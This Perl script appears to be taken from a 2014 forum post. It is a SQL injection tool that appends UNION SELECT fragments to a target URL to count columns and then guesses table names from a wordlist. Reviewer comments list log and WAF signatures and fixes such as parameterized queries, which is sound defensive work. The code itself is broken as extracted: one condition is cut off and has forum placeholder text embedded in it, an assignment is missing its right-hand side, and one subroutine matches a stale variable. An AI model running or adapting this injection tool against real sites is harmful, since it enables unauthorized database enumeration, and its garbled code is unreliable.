#!/usr/bin/perl
#
# MySQL Table Miner
# -Finds # of args first, then tries table names
# -Use 'bsqlinj.pl' to get database()
# -dict.txt is default wordlist
# amat
#
# Source: forum post "MySQL Table Miner" by sQuo, posted April 4, 2014.
#
# What the script does, as far as the visible code shows:
#   1. loop()  appends " UNION SELECT 1[,1...]" to the target URL and keeps
#      adding ",1" until the response body matches the expected string.
#   2. brute() then appends "FROM <database>.<word> WHERE 1=0" for each line
#      of dict.txt and prints the word when the match succeeds.
#
# Reviewer notes (defensive reading):
#   - Every request is a plain GET built by string concatenation, so the
#     literal substrings " UNION SELECT 1,1" and "WHERE 1=0" appear in the
#     request URL. A long sequential run of such requests from one client is
#     a usable signature for web-server logs or WAF rules.
#   - No agent string is set on the LWP::UserAgent object in the visible
#     code, so requests should carry the library default ("libwww-perl/...").
#   - The probe depends on the application concatenating request input into
#     SQL. Parameterized queries remove the injection point; a database
#     account without rights on other schemas limits the "<database>.<table>"
#     lookups.
#   - No "use strict" / "use warnings"; all variables are package globals
#     shared between the top-level code, loop() and brute().
use LWP;
$browser = LWP::UserAgent->new;

# NOTE(review): this statement is syntactically incomplete as extracted. The
# condition is cut off and the forum's "hidden content" placeholder is
# embedded in the usage string. Left exactly as found on the page.
if (@ARGV print "Usage: $0 This is the hidden content, please Sign In or Sign Up expected_string database"; }

$tables = "1";          # column list for the UNION SELECT, grown by loop()
$n = "0";               # index into @guess, advanced by brute()
$target = $ARGV[0];     # URL the query fragments are appended to
$expected = $ARGV[1];   # used as a regex pattern against the response body
$db = $ARGV[2];         # database name interpolated into "FROM $db.<word>"

print "\ntarget: $target\n";
print "expected: $expected\n";
print "database: $db\n";

# Two-argument open on a bareword handle; the die message does not include $!.
open(DICT, "dict.txt") || die "No such file.\n";
# NOTE(review): the right-hand side of this assignment is missing in the
# extracted text (presumably a readline on DICT -- confirm against the
# original post). Left as found.
@guess=;
close(DICT);
$words = scalar(@guess);
print "words: $words\n\n";
loop();

# loop: request the target with the current " UNION SELECT $tables" suffix.
# On a match against $expected it prints the counter and calls brute();
# otherwise it increments $nulls, appends ",1" to $tables, prints the suffix
# and recurses. There is no upper bound on the recursion in the visible code.
sub loop {
    $test = " UNION SELECT $tables";
    $response = $browser->get( $target . $test );
    $_ = $response->content;
    # $expected is interpolated unescaped, so regex metacharacters in it are
    # interpreted as pattern syntax.
    if (m/$expected/) {
        print "\narguments: $nulls \n\n";
        brute();
    } else {
        $nulls = $nulls + 1;
        $tables = "$tables,1";
        print "$test\n";
        loop();
    }
}

# brute: request the target with "$test" plus "FROM $db.<word> WHERE 1=0" for
# the dictionary entry at index $n, print the entry when the match succeeds,
# then advance $n and recurse while $words > $n.
sub brute {
    chomp $guess[$n];
    $db_test = "FROM $db.$guess[$n] WHERE 1=0";
    $response = $browser->get( $target . $test . $db_test );
    # The match below is applied to $_; this sub does not assign $_ itself.
    if (m/$expected/) {
        print "$test $db_test";
        print "\ntable: $guess[$n]\n";
        if ($words > $n) { $n = $n + 1; brute(); }
    } else {
        $n = $n + 1;
        print "$test $db_test\n";
        if ($words > $n) { brute(); }
    }
}